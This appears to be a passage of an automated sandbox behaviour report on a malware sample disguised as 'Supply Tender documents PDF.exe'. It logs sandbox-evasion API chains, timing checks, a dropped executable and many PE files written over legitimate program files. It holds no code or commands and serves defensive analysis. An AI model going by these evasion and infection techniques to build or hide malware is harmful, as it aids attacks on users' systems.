Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mfpmp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mfpmp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mfpmp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mfpmp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mfpmp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking computer name)

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Evasive API call chain: GetComputerName,DecisionNodes,Sleep

graph_0-180361

Found evasive API chain (may stop execution after checking volume information)

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Evasive API call chain: GetVolumeInformation,DecisionNodes,Sleep

graph_0-180360

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	API/Special instruction interceptor: Address: CFECEC
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	API/Special instruction interceptor: Address: B6FF34
Source: C:\Windows\SysWOW64\mfpmp.exe	API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\mfpmp.exe	API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\mfpmp.exe	API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\mfpmp.exe	API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\mfpmp.exe	API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\mfpmp.exe	API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\mfpmp.exe	API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\mfpmp.exe	API/Special instruction interceptor: Address: 7FFCC372DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_0337096E rdtsc

5_2_0337096E

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\msdtc.exe	Window / User API: threadDelayed 493	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 6145
Source: C:\Windows\SysWOW64\perfhost.exe	Window / User API: threadDelayed 3852
Source: C:\Windows\SysWOW64\mfpmp.exe	Window / User API: threadDelayed 5263
Source: C:\Windows\SysWOW64\mfpmp.exe	Window / User API: threadDelayed 4706

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-181255

Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-183072

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 7676	Thread sleep time: -510000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe TID: 7708	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msdtc.exe TID: 8172	Thread sleep count: 493 > 30	Jump to behavior
Source: C:\Windows\System32\msdtc.exe TID: 8172	Thread sleep time: -49300s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe TID: 5864	Thread sleep count: 6145 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 5864	Thread sleep time: -61450000s >= -30000s
Source: C:\Windows\SysWOW64\perfhost.exe TID: 5864	Thread sleep count: 3852 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 5864	Thread sleep time: -38520000s >= -30000s
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe TID: 5736	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\mfpmp.exe TID: 7916	Thread sleep count: 5263 > 30
